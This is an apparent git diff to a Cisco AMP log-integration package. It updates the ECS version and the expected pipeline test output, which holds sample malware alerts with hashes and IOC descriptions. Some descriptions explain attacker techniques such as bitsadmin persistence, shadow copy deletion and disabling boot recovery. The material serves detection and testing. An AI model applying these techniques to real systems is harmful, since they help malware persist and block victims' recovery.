diff --git a/packages/cisco_amp/_dev/build/build.yml b/packages/cisco_amp/_dev/build/build.yml
index a138b554aa0..08d85edcf9a 100644
--- a/packages/cisco_amp/_dev/build/build.yml
+++ b/packages/cisco_amp/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
 ecs:
- reference: git@1.11
+ reference: git@1.12
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
similarity index 97%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
index 3ef7fced190..a2729963432 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
@@ -12,7 +12,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -38,7 +38,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701333474Z", + "ingested": "2021-09-13T18:06:29.783713069Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -86,7 +86,7 @@ { "@timestamp": "2021-01-14T10:15:29.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -104,7 +104,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701337792Z", + "ingested": "2021-09-13T18:06:29.783719163Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6533243623469744000", "kind": "alert" @@ -159,7 +159,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -191,7 +191,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701339869Z", + "ingested": "2021-09-13T18:06:29.783721500Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -248,7 +248,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -268,7 +268,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701341785Z", + "ingested": "2021-09-13T18:06:29.783723655Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -319,7 +319,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -339,7 +339,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701343742Z", + "ingested": "2021-09-13T18:06:29.783725794Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -407,7 +407,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -439,7 +439,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701345707Z", + "ingested": "2021-09-13T18:06:29.783727990Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -507,7 +507,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -537,7 +537,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701347645Z", + "ingested": "2021-09-13T18:06:29.783730076Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -594,7 +594,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -614,7 +614,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701349558Z", + "ingested": "2021-09-13T18:06:29.783732206Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -672,7 +672,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -692,7 +692,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701351457Z", + "ingested": "2021-09-13T18:06:29.783734294Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -758,7 +758,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -778,7 +778,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701353384Z", + "ingested": "2021-09-13T18:06:29.783736424Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -844,7 +844,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -864,7 +864,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701355274Z", + "ingested": "2021-09-13T18:06:29.783738503Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -930,7 +930,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -950,7 +950,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701357412Z", + "ingested": "2021-09-13T18:06:29.783740861Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "kind": "alert", "start": "2021-01-14T10:04:56.000Z", @@ -1016,7 +1016,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1036,7 +1036,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701359314Z", + "ingested": "2021-09-13T18:06:29.783742934Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", "kind": "alert", "start": "2021-01-14T10:04:49.000Z", @@ -1102,7 +1102,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
